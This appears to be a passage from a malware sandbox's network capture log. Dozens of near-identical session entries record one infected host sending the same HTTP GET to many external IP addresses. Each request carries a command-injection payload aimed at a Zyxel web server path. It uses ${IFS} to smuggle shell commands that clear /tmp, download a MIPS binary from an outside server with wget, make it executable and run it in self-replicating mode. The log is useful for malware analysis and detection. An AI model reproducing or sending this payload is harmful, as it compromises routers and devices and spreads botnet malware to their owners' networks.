                                        Jan 14, 2024 16:19:02.879277945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9296192.168.2.1359982117.37.184.159443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.879347086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9297192.168.2.1349044106.136.70.168443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.879374027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9298192.168.2.1352480206.111.175.158443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.879410982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9299192.168.2.1360750198.102.35.187443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.879468918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9300192.168.2.1356730172.201.239.169443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.879489899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9301192.168.2.134035083.161.206.111443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.879549026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9302192.168.2.1357956131.247.226.24443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.879570007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9303192.168.2.1338580195.22.231.72443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.879609108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9304192.168.2.135502099.242.85.34443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.879662991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9305192.168.2.1336350100.25.223.207443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.879703999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9306192.168.2.1347228155.59.170.77443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.879734993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9307192.168.2.134670281.106.225.255443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.879772902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9308192.168.2.133547882.60.185.126443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.879823923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9309192.168.2.1354710103.167.171.57443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.879857063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9310192.168.2.1350586130.130.118.50443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.879897118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9311192.168.2.1338470182.30.93.170443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.879924059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9312192.168.2.1352856220.177.151.233443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.879987001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9313192.168.2.1342020187.222.76.29443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.880021095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9314192.168.2.1359064103.76.108.15443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.880055904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9315192.168.2.134429684.45.18.49443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.880115032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9316192.168.2.1346004221.255.156.31443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.880156040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9317192.168.2.1351584145.154.226.201443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.880198002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9318192.168.2.134587276.60.152.208443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.880239964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9319192.168.2.135370838.139.90.4443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.880289078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9320192.168.2.134510047.86.51.35443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.880317926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9321192.168.2.1344350188.245.49.168443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.880352974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9322192.168.2.13337088.110.224.167443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.880412102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9323192.168.2.1360120101.179.194.234443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.880439997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9324192.168.2.1351740133.215.1.56443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.880511999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9325192.168.2.134881289.35.140.195443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.880544901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9326192.168.2.1353678141.74.69.241443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.880588055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9327192.168.2.1353414122.184.29.240443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.880623102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9328192.168.2.1336396121.190.150.241443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.880670071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9329192.168.2.1349642188.159.114.83443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.880719900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9330192.168.2.1343250220.52.160.23443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.880753040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9331192.168.2.134225269.215.6.91443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.880788088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9332192.168.2.1349534132.40.159.43443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.880836010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9333192.168.2.1338356130.56.7.208443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.880904913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9334192.168.2.133912298.144.42.64443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.880939960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9335192.168.2.1355074189.15.154.47443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.880973101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9336192.168.2.1360398207.152.249.199443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.881036043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9337192.168.2.1355708131.55.184.122443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.881082058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9338192.168.2.13373669.126.20.76443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.881112099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9339192.168.2.13357804.145.180.115443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.881155968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9340192.168.2.134663064.236.12.225443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.881189108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9341192.168.2.135741079.17.91.163443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.881242990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9342192.168.2.1333696192.223.7.153443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.881293058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9343192.168.2.1342004153.102.80.135443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.881347895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9344192.168.2.135330495.99.96.40443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.881346941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9345192.168.2.1334528216.118.111.210443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.881411076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9346192.168.2.135591259.187.183.61443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.881445885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9347192.168.2.1342896190.240.28.5443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.881486893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9348192.168.2.13451925.211.46.41443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.881530046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9349192.168.2.1351714134.121.49.98443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.881580114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9350192.168.2.1344496222.159.141.3443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.881614923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9351192.168.2.1335652197.231.124.22443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.881640911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9352192.168.2.1342266111.8.140.91443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.881690979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9353192.168.2.135643682.104.222.137443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.881750107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9354192.168.2.1346412140.188.253.245443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.881793976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9355192.168.2.1352094189.170.82.107443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.881823063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9356192.168.2.134150293.36.180.219443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.881861925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9357192.168.2.1351030122.254.102.188443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:02.881900072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9358192.168.2.134980443.138.20.239443
                                        TimestampBytes transferredDirectionData
